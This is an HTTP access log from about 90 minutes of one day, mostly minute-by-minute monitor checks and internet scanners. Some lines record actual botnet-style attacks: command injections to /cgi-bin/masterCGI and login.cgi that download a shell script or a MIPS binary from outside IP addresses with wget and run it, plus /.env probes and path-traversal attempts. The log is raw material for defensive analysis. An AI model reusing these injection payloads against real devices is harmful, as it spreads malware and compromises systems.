141.255.166.2 - - [02/Dec/2022:11:50:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Dec/2022:11:50:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
69.162.243.124 - - [02/Dec/2022:11:51:14 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.243.124 - - [02/Dec/2022:11:51:15 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
194.55.186.124 - - [02/Dec/2022:11:51:26 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
69.162.243.124 - - [02/Dec/2022:11:51:43 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.243.124 - - [02/Dec/2022:11:51:43 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:11:51:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:52:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:53:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:54:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:55:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.186 - - [02/Dec/2022:11:56:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [02/Dec/2022:11:56:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.47 - - [02/Dec/2022:11:57:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.47 - - [02/Dec/2022:11:57:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.47 - - [02/Dec/2022:11:57:08 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.47 - - [02/Dec/2022:11:57:08 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Dec/2022:11:57:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:58:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:11:59:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:00:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:01:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.31.44.156 - - [02/Dec/2022:12:02:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
85.31.44.156 - - [02/Dec/2022:12:03:08 +0100] "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [02/Dec/2022:12:03:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:04:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:05:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
173.214.175.178 - - [02/Dec/2022:12:06:03 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
176.58.127.206 - - [02/Dec/2022:12:06:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [02/Dec/2022:12:06:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:07:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:08:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:09:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:10:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:11:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:12:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:13:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [02/Dec/2022:12:14:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [02/Dec/2022:12:14:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.31.44.156 - - [02/Dec/2022:12:15:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
85.31.44.156 - - [02/Dec/2022:12:15:18 +0100] "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [02/Dec/2022:12:15:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:16:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:17:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:18:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:19:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:12:20:15 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:12:20:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [02/Dec/2022:12:21:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:12:21:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:12:21:35 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [02/Dec/2022:12:21:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:22:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:23:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:24:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:25:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:26:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:27:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.31.44.156 - - [02/Dec/2022:12:28:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
85.31.44.156 - - [02/Dec/2022:12:28:08 +0100] "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1" 404 322 "-" "-"
212.91.246.72 - - [02/Dec/2022:12:28:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:29:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.116 - - [02/Dec/2022:12:30:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0"
212.91.246.72 - - [02/Dec/2022:12:30:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:31:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:32:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:33:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.112 - - [02/Dec/2022:12:34:11 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
183.136.225.32 - - [02/Dec/2022:12:34:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [02/Dec/2022:12:34:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.55.128.73 - - [02/Dec/2022:12:35:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.55.128.73 - - [02/Dec/2022:12:35:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.55.128.73 - - [02/Dec/2022:12:35:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Dec/2022:12:35:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:36:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:37:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:38:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:12:39:04 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:12:39:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:40:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:41:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:12:42:37 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:12:42:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [02/Dec/2022:12:42:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:12:42:58 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [02/Dec/2022:12:43:03 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [02/Dec/2022:12:43:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:44:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:45:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.124 - - [02/Dec/2022:12:46:02 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Dec/2022:12:46:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:47:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
75.67.32.138 - - [02/Dec/2022:12:48:27 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Dec/2022:12:48:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
173.214.175.178 - - [02/Dec/2022:12:49:35 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2022:12:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.212.102.127 - - [02/Dec/2022:12:50:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:12:50:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:51:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:52:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:53:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:54:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:55:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.114.242.3 - - [02/Dec/2022:12:56:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:12:56:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:57:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:58:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:12:59:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:00:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:01:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.15 - - [02/Dec/2022:13:02:46 +0100] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
185.224.128.15 - - [02/Dec/2022:13:02:50 +0100] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Dec/2022:13:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:03:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.55.186.216 - - [02/Dec/2022:13:04:16 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
173.214.175.178 - - [02/Dec/2022:13:04:52 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2022:13:04:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.221.101 - - [02/Dec/2022:13:05:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Dec/2022:13:05:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:06:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:07:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:08:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:09:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.35.34 - - [02/Dec/2022:13:09:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Dec/2022:13:10:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:11:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.208.187 - - [02/Dec/2022:13:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [02/Dec/2022:13:12:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:13:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:14:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.15 - - [02/Dec/2022:13:15:31 +0100] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Dec/2022:13:15:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.221.101 - - [02/Dec/2022:13:15:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
139.162.208.187 - - [02/Dec/2022:13:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
212.91.246.72 - - [02/Dec/2022:13:16:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.150.127.138 - - [02/Dec/2022:13:17:51 +0100] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:17:51 +0100] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:17:51 +0100] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
212.91.246.72 - - [02/Dec/2022:13:17:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.150.127.138 - - [02/Dec/2022:13:18:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:18:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:18:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.15 - - [02/Dec/2022:13:18:12 +0100] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
107.150.127.138 - - [02/Dec/2022:13:18:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:22 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:22 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:22 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:23 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:23 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:23 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:25 +0100] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:18:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2022:13:18:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.150.127.138 - - [02/Dec/2022:13:18:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
